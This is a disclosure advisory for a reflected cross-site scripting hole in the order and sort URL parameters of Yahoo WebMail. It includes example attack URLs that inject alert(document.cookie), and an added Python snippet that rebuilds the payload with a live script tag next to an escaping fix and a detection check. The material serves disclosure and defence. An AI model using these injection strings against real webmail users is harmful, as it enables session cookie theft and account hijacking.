Yahoo WebMail! Cross Site Scripting Vulnerability (order, sort)

Summary

Yahoo is one of the world's best-known and most widely used free web mail vendors. Yahoo mail is very reliable, safe and fast, and it also allows secure connections (SSL) when checking mail. A cross-site scripting vulnerability allows a remote attacker to hijack existing accounts.

Credit:

The information has been provided by Rafel Ivgi, The-Insider.


Details

Vulnerable Systems:
 * Yahoo WebMail!

Upon logging into Yahoo WebMail! and opening an email message, the URL looks something along the lines of:
http://us.f200.mail.yahoo.com/ym/ShowLetter?MsgId=3308_151647_1069_1720_553_0_917_-1_0&YY=96862&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=Inbox

Testing all the variables seen in the URL yields the following results:

MsgId=3308_151647_1069_1720_553_0_917_-1_0 -> this field's content doesn't really matter; what is important is that it is numeric and written with the correct syntax.
YY=96862 -> safe
inc=25 -> safe
order=down'><scr!pt>alert('xss')</scr!pt> -> vulnerable
sort=date'><scr!pt>alert('xss')</scr!pt> -> vulnerable
pos=0 -> safe
view=a -> safe
head=b -> safe
box=Inbox -> safe

Note: The script tag has been replaced with scr!pt so that an alert wouldn’t pop up in the viewer’s browser.

Pointing the browser to one of the following links while logged on, or while a cookie containing authentication information is saved on the local machine, allows script injection and thus theft of the account.

The following examples illustrate the vulnerability:
http://us.f200.mail.yahoo.com/ym/ShowLetter?MsgId=3308_151647_1069_1720_553_0_917_-1_0&YY=96862&inc=25&order=down'><scr!pt>alert('This can be your cookie')</scr!pt>&sort=date&pos=0&view=a&head=b&box=Inbox

http://us.f200.mail.yahoo.com/ym/ShowLetter?MsgId=3308_151647_1069_1720_553_0_917_-1_0&YY=92552&inc=25&order=down&sort=date'><scr!pt>alert(document.cookie)</scr!pt>&pos=0&view=a&head=b&box=Inbox
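As an added illustration that is not part of the advisory and not Yahoo's code, the snippet below models how a parameter reflected into a single-quoted attribute lets the `'>` payload above close the attribute and start a tag, beside the allow-list plus attribute-escaping fix a defender would apply and a simple check for logged query values. The page fragment, the allow-lists and the helper names are assumptions; the URL is constructed from the second link above with a real script tag so the escaping is actually exercised.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumed allow-lists for the two reflected parameters (not from the advisory).
ALLOWED_ORDER = {"up", "down"}
ALLOWED_SORT = {"date", "from", "subject", "size"}


def params_from_url(url):
    """Pull `order` and `sort` out of a ShowLetter URL's query string."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q.get("order", [""])[0], q.get("sort", [""])[0]


def render_vulnerable(order, sort):
    """Hypothetical page fragment that reflects both values unescaped into a
    single-quoted attribute, the behaviour the advisory's findings imply."""
    return f"<a href='ShowLetter?order={order}&sort={sort}'>Re-sort</a>"


def render_hardened(order, sort):
    """Fall back to defaults for anything outside the allow-list, then escape
    for the attribute context (quote=True also turns ' into &#x27;)."""
    if order not in ALLOWED_ORDER:
        order = "down"
    if sort not in ALLOWED_SORT:
        sort = "date"
    return (f"<a href='ShowLetter?order={html.escape(order, quote=True)}"
            f"&amp;sort={html.escape(sort, quote=True)}'>Re-sort</a>")


def suspicious_value(value):
    """Log review check: does a value try to close an attribute or open a tag?"""
    return any(tok in value for tok in ("'>", '">', "<", "javascript:"))


# Constructed example URL modelled on the advisory's second link.
EXAMPLE_URL = ("http://us.f200.mail.yahoo.com/ym/ShowLetter"
               "?MsgId=3308_151647_1069_1720_553_0_917_-1_0&YY=92552&inc=25"
               "&order=down&sort=date'><script>alert(document.cookie)</script>"
               "&pos=0&view=a&head=b&box=Inbox")

if __name__ == "__main__":
    order, sort = params_from_url(EXAMPLE_URL)
    print("vulnerable:", render_vulnerable(order, sort))
    print("hardened:  ", render_hardened(order, sort))
    print("suspicious:", suspicious_value(sort))
```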
